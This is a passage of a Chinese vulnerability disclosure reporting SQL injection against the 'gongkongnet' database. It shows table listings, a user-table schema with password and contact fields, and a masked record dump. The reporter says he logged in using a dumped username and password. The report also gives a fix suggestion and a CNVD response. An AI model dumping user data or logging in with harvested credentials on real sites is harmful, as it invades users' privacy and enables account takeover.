| dbo.ClubMessageType                    | 10      |
| dbo.DatumType                          | 10      |
| dbo.MPRuleType                         | 10      |
| dbo.MRReportType                       | 10      |
| dbo.NewsSocialType                     | 10      |
| dbo.WuliuModelParameters               | 10      |
| dbo.DatumIndustry_Del                  | 9       |
| dbo.ExtWebUserBind                     | 9       |
| dbo.solutionsArtBak                    | 9       |
| dbo.BaseRegion                         | 8       |
| dbo.CompanyType                        | 8       |
| dbo.Datum_Del                          | 8       |
| dbo.HREducational                      | 8       |
| dbo.HRWorkYear                         | 8       |
| dbo.PaperType                          | 8       |
| dbo.ResearchNewsType                   | 8       |
| dbo.StockType                          | 8       |
| dbo.BizSales_Del                       | 7       |
| dbo.BizTrades_Del                      | 7       |
| dbo.CommonMutuality                    | 7       |
| dbo.MRCustomer                         | 7       |
| dbo.smsType                            | 7       |
| dbo.UserLoginInfo                      | 7       |
| dbo.english_feedback                   | 6       |
| dbo.HrUserIndexUpdate                  | 6       |
| dbo.OAGiftType                         | 6       |
| dbo.ProseminarIndustry                 | 6       |
| dbo.ProseminarType                     | 6       |
| dbo.RegUserGroupType                   | 6       |
| dbo.Setting                            | 6       |
| dbo.ActRoleGroup                       | 5       |
| dbo.BizCooperateType                   | 5       |
| dbo.Competency                         | 5       |
| dbo.HrHunter                           | 5       |
| dbo.OnlineDemoQuestion                 | 5       |
| dbo.ProductCustomTypeBaseProductType   | 5       |
| dbo.RecvMsgTable                       | 5       |
| dbo.TutoriaType                        | 5       |
| dbo.v_Forum_List3                      | 5       |
| dbo.ActRolePermission                  | 4       |
| dbo.ArticleType                        | 4       |
| dbo.BSite                              | 4       |
| dbo.ExpositionType                     | 4       |
| dbo.MessageType                        | 4       |
| dbo.OnlineProsemSubject                | 4       |
| dbo.PayType                            | 4       |
| dbo.TechArticle_Del                    | 4       |
| dbo.BizTradesType                      | 3       |
| dbo.BookIndexAction                    | 3       |
| dbo.BookWarehouse                      | 3       |
| dbo.CompanyDomainName                  | 3       |
| dbo.CompanyRepair                      | 3       |
| dbo.CoTemplatePage                     | 3       |
| dbo.HrNewsType                         | 3       |
| dbo.MediaNewsType                      | 3       |
| dbo.ProductDocumentIndustry            | 3       |
| dbo.ProductTypeBrandRel                | 3       |
| dbo.ResearchReportType                 | 3       |
| dbo.s_advertising                      | 3       |
| dbo._temp_ProductModel4Custom          | 2       |
| dbo.AdvertiseBrand                     | 2       |
| dbo.AdvOpenSetting                     | 2       |
| dbo.CommunityType                      | 2       |
| dbo.CompanyUsers                       | 2       |
| dbo.CoTemplateArea                     | 2       |
| dbo.HrAdactivity                       | 2       |
| dbo.MmsType                            | 2       |
| dbo.MPWarningSet                       | 2       |
| dbo.ProductBidding                     | 2       |
| dbo.SolutionType                       | 2       |
| dbo.sysfile1                           | 2       |
| dbo.BizTradesIndexAction               | 1       |
| dbo.BPriceKeyword                      | 1       |
| dbo.CommonMisspellings                 | 1       |
| dbo.CommonSubjectInd                   | 1       |
| dbo.CompanyIndexAction                 | 1       |
| dbo.CompanySection                     | 1       |
| dbo.CoTemplate                         | 1       |
| dbo.DatumIndexAction                   | 1       |
| dbo.InfoPublicationFeedback            | 1       |
| dbo.IpForumFrequency                   | 1       |
| dbo.MediaPaperType                     | 1       |
| dbo.OnlineCurrentProseminar            | 1       |
| dbo.paperPrize                         | 1       |
| dbo.PhotoContestPage                   | 1       |
| dbo.ProseminarIndexAction              | 1       |
| dbo.RegUserOnline                      | 1       |
| dbo.tv_visiter                         | 1       |
| dbo.UserForumFrequency                 | 1       |
| dbo.videoVoice                         | 1       |
| dbo.ViewForumAdmin                     | 1       |
| dbo.ViewUnid                           | 1       |
| dbo.WapAd                              | 1       |
| dbo.WapCompany                         | 1       |
+----------------------------------------+---------+


Database: gongkongnet
Table: RegUserView
[72 columns]
+----------------------+----------+
| Column               | Type     |
+----------------------+----------+
| active               | int      |
| actUserId            | char     |
| address              | nvarchar |
| answer               | nvarchar |
| biddingType          | char     |
| classday             | nvarchar |
| comCreatDate         | datetime |
| Comment              | varchar  |
| companyName          | nvarchar |
| companyUrl           | nvarchar |
| customSettings       | nvarchar |
| disableBizTrade      | char     |
| disableForum         | char     |
| distributeRate       | decimal  |
| email                | nvarchar |
| emailAlertTime       | datetime |
| fax                  | nvarchar |
| feedbacktrashnum     | int      |
| flag                 | char     |
| handset              | nvarchar |
| height               | nvarchar |
| id                   | char     |
| industryBound        | nvarchar |
| industryCode         | bigint   |
| interest             | nvarchar |
| interestCode         | bigint   |
| isAcceptSMS          | int      |
| IsAdded              | int      |
| isAddressValidation  | int      |
| isCardIdValidation   | int      |
| isemail              | int      |
| isEmailAlert         | char     |
| isExpert             | int      |
| isFaxValidation      | int      |
| isJoinMp             | int      |
| ismobile             | int      |
| isPhoneValidation    | int      |
| isTrueNameValidation | int      |
| isUsefulAddress      | char     |
| isUsefulEMail        | bit      |
| isUsefulPhone        | char     |
| isUsefulUserInfo     | char     |
| job                  | nvarchar |
| jobdgree             | nvarchar |
| joinFrom             | nvarchar |
| joinMPTime           | datetime |
| joinTime             | datetime |
| lastLogin            | datetime |
| lastTime             | datetime |
| loginName            | nvarchar |
| loginPoint           | int      |
| market               | nvarchar |
| oldcode              | int      |
| organization         | nvarchar |
| ownership            | nvarchar |
| panman               | nvarchar |
| password             | nvarchar |
| persons              | nvarchar |
| phone                | nvarchar |
| postalcode           | nvarchar |
| productTypeBound     | nvarchar |
| province             | nvarchar |
| question             | nvarchar |
| sex                  | char     |
| status               | char     |
| trueName             | nvarchar |
| turnover             | nvarchar |
| updateDate           | datetime |
| userType             | nvarchar |
| validLevel           | int      |
| vipRequest           | char     |
| workday              | nvarchar |
+----------------------+----------+


mask 区域 
*****----------+----*****
*****         *****
*****----+-------*****
*****        | *****
*****      | liu*****
*****         *****
*****      |  23*****
*****        | *****
*****    |  镇^*****
*****         *****
*****        *****
*****         *****
*****        | *****
*****         *****
*****         *****
*****        | *****
*****        *****
*****        *****
*****         *****
*****        | *****
*****         *****
*****         *****
*****         *****
*****9        *****
*****         *****
*****    | 抓住*****
*****        | *****
*****         *****
*****        | *****
*****        | *****
*****         *****
*****          *****
*****          *****
*****         *****
*****    | 好想*****
*****            *****
*****          *****
*****          *****
*****        | hu*****
*****          *****
*****          *****
*****        | *****
*****         *****
*****         *****
*****         *****
*****         *****
*****        | *****
*****         *****
*****        | *****
*****         *****
*****         *****
*****          |*****
*****          *****
*****        | ^*****
*****          *****
*****4567890-= |*****
*****        | *****
*****      | con*****
*****        | *****
*****          *****
*****        | *****
*****        | *****
*****        | *****
*****      | 全*****
*****         *****
*****        | *****
*****         *****
*****        | *****
*****        | *****
*****        | *****
*****         *****
*****         *****
*****        | *****
*****        | *****
*****6297     *****
*****        | *****
*****         *****
*****         *****
*****5        *****
*****        | *****
*****        | ^*****
*****         *****
*****    | 正在*****
*****         *****
*****         *****
*****         *****
*****        | *****
*****        *****
*****         *****
*****         *****
*****        | *****
*****         *****
*****        | *****
*****        | *****
*****         *****
*****        | *****
*****        | *****
*****         *****
*****         *****
*****        | *****
*****         *****
*****        | *****
*****         *****
*****      | zhe*****
*****        | *****
*****         *****
*****        | zi*****
*****         *****
*****        | *****
*****        | *****
*****        | *****
*****        | *****
*****         *****
*****        | *****
*****         *****
*****        | *****
*****    | 小子*****
*****         *****
*****        | *****
*****         *****
*****         *****
*****        | *****
*****         *****
*****        | *****
*****        | *****
*****        | *****
*****        | *****
*****         *****
*****         *****
*****        | *****
*****         *****
*****9        *****
*****         *****
*****        | *****
*****         *****
*****        | *****
*****        | *****
*****        | *****
*****         *****
*****         *****
*****        | *****
*****        | *****
*****         *****
*****        | *****
*****         *****
*****!        *****
*****         *****
*****    | 忙碌*****
*****        | *****
*****         *****
*****        | *****
*****         *****
*****         *****
*****         *****
*****      | 汉*****
*****         *****
*****         *****
*****         *****
*****         *****
*****         *****
*****05       *****
*****         *****
*****         *****
*****        | *****
*****         *****
*****         *****
*****         *****
*****        | *****
*****      | 杨*****
*****        | *****
*****    | 沙漠*****
*****         *****
*****         *****
*****ot;        *****
*****            *****
*****         *****
*****        | *****
*****         *****
*****      | 琐*****
*****         *****
*****        | *****
*****        | *****
*****         *****
*****      | 琐*****
*****    | KUVI58*****


51个库.jpg


用户名密码.jpg


随便试了个用户名密码,登录成功

登录验证.jpg

漏洞证明:

51个库.jpg


用户名密码.jpg


登录验证.jpg

修复方案:

过滤参数,上waf 或者软件防火墙

版权声明:转载请注明来源 小菜果子@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-03-18 18:22

厂商回复:

CNVD未直接复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-03-22 10:03 | 酱油哥 ( 实习白帽子 | Rank:53 漏洞数:3 | 打酱油。)

    2010的时候,就已经脱裤了~